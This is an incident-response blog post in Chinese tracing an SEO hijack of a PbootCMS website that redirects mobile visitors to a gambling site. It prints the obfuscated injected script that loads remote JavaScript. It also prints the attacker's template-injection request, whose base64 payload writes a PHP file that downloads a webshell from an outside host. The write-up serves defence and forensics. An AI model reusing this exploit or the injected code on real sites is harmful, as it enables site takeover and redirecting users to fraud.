应急响应|SEO暗链排查和溯源

admin

138876
文章

114
评论

2024年3月14日18:06:27评论49 views字数 3400阅读11分20秒阅读模式

朋友的网站本来想看看seo做的怎么样，结果发现被劫持了。

应急响应|SEO暗链排查和溯源

pc端是正常访问的，手机端则跳转到bc站。

应急响应|SEO暗链排查和溯源

先看看前端里面被劫持的内容

<title>&#107;&#121;&#20307;&#32946;&#40;&#107;&#121;&#41;&#40;&#20013;&#22269;&#41;&#23448;&#26041;&#32593;&#31449;&#73;&#79;&#83;&#47;&#23433;&#21331;&#36890;&#29992;&#29256;&#47;&#25163;&#26426;&#65;&#80;&#80;</title><meta name="description" content="&#31532;&#19968;&#27493;&#58;&#35775;&#38382;&#107;&#121;&#20307;&#32946;&#39318;&#20808;&#44;&#25171;&#24320;&#24744;&#30340;&#97;&#112;&#112;&#27983;&#35272;&#22120;&#44;&#36755;&#20837;&#107;&#121;&#20307;&#32946;&#30340;&#23448;&#26041;&#32593;&#22336;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#119;&#119;&#119;&#46;&#104;&#116;&#104;&#57;&#57;&#54;&#54;&#46;&#118;&#105;&#112;&#46;&#46;&#46;&#46;&#10;&#31532;&#20108;&#27493;&#58;&#28857;&#20987;&#27880;&#20876;&#25353;&#38062;&#19968;&#26086;&#36827;&#20837;&#107;&#121;&#20307;&#32946;&#23448;&#32593;&#44;&#24744;&#20250;&#22312;&#39029;&#38754;&#19978;&#25214;&#21040;&#19968;&#20010;&#37266;&#30446;&#30340;&#27880;&#20876;&#25353;&#38062;&#12290;&#28857;&#20987;&#35813;&#25353;&#38062;&#44;&#46;&#46;&#46;&#10;&#31532;&#19977;&#27493;&#58;&#22635;&#20889;&#27880;&#20876;&#20449;&#24687;&#22312;&#27880;&#20876;&#39029;&#38754;&#19978;&#44;&#24744;&#38656;&#35201;&#22635;&#20889;&#19968;&#20123;&#24517;&#35201;&#30340;&#20010;&#20154;&#20449;&#24687;&#26469;&#21019;&#107;&#121;&#20307;&#32946;&#65039;" /><meta name="keywords" content="&#107;&#121;&#20307;&#32946;&#40;&#107;&#121;&#41;&#40;&#20013;&#22269;&#41;&#23448;&#26041;&#32593;&#31449;&#73;&#79;&#83;&#47;&#23433;&#21331;&#36890;&#29992;&#29256;&#47;&#25163;&#26426;&#65;&#80;&#80;" /><script type="text/javascript"> var bt = String.fromCharCode(60,115,99,114,105,112,116,32,116,121,112,101,61,32,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,47,47,97,104,117,105,46,106,105,115,50,51,50,46,99,99,47,97,104,117,105,46,106,115,34,62,60,47,115,99,114,105,112,116,62); document.write(bt); </script>

HTML解码一下

应急响应|SEO暗链排查和溯源

<script type="text/javascript"> var bt = String.fromCharCode(60,115,99,114,105,112,116,32,116,121,112,101,61,32,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,47,47,97,104,117,105,46,106,105,115,50,51,50,46,99,99,47,97,104,117,105,46,106,115,34,62,60,47,115,99,114,105,112,116,62); document.write(bt); </script>

这段js代码直接让ai帮我们分析就好

应急响应|SEO暗链排查和溯源

开始溯源，首先登录网站后台看看日志，日志中显示没有登录成功，那么很明显不是弱口令导致的(因为网站密码是比较强一点的弱口令)。

应急响应|SEO暗链排查和溯源

很明显这修改日期不对劲，因为最近没有操作文件，那很可能就是黑客弄得，那么我们开始还原攻击链

应急响应|SEO暗链排查和溯源

首先从这几个文件日期离我们当前日期最远的wolf.php开始

应急响应|SEO暗链排查和溯源

远程下载大马，命名为King.php，跟服务器的对上了

应急响应|SEO暗链排查和溯源

再看db.php很明显也是个马子，应该是为了防止木马被删故意伪装成db.php

应急响应|SEO暗链排查和溯源

进入服务器开始还原攻击，下载/www/wwwlogs/xx.xx.xxx.xx.log日志文件，搜索wolf.php

应急响应|SEO暗链排查和溯源

/{pboot:if((x22file_put_cox22.x22ntentsx22)(x22wolf.phpx22,(x22base6x22.x224_decodex22)(x22R2lmODlhPD9waHAKJGE9ImNvcHkiOwokYSgiaHR0cDovLzYxLjE0Ny45My4xMjE6OTk4OC9haC50eHQiLCJLaW5nLnBocCIpOwo/Pg==x22)))}{/pboot:if}/../../?p=1

把x22去掉

/{pboot:if((file_put_contents)(wolf.php,(base6.4_decode)(R2lmODlhPD9waHAKJGE9ImNvcHkiOwokYSgiaHR0cDovLzYxLjE0Ny45My4xMjE6OTk4OC9haC50eHQiLCJLaW5nLnBocCIpOwo/Pg==)))}{/pboot:if}/../../?p=1

很明显是PbootCMS模板注入，并且用x22进行绕过了

查看他攻击ip:103.123.4.235，四川的ip估计也是跳板机

应急响应|SEO暗链排查和溯源

大马样本链接https://s.threatbook.com/report/file/c2334df08eb35adf683a0bc0c1f35707a2750fa2b8707ee12a5c83a99783641f?sign=history&env=ubuntu_1704_x64

应急响应|SEO暗链排查和溯源

攻击链:

PbootCMS模板注入getshell>>远程http://61.147.93.121:9988/ah.txt下载大马>>修改template/中的index.html文件>>修改标题和关键字>>调用js文件https://ahui.jis232.cc/ahui.js>>重定向到xxx.vip

漏洞分析文章下次！

原文始发于微信公众号（星云安全）：应急响应|SEO暗链排查和溯源

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

应急响应|SEO暗链排查和溯源

利用Claude3.7分析wireshark流量包

应急响应-Spring框架内存马定性与其他补充内存马

应急响应-工具-ELK日志分析系统与Yara规则识别样本

Windows 通用日志文件系统（CLFS）解析

应急响应-传统Web内存马查杀

啊？谁把我黑了？？（二）

啊？谁把我黑了？？（一）

撕开安全假象：一场无限逼近真实的勒索演练

【应急响应】某变异Webshell流量分析（玄机靶场）

流量分析 - 测试篇

发表评论

在线咨询

微信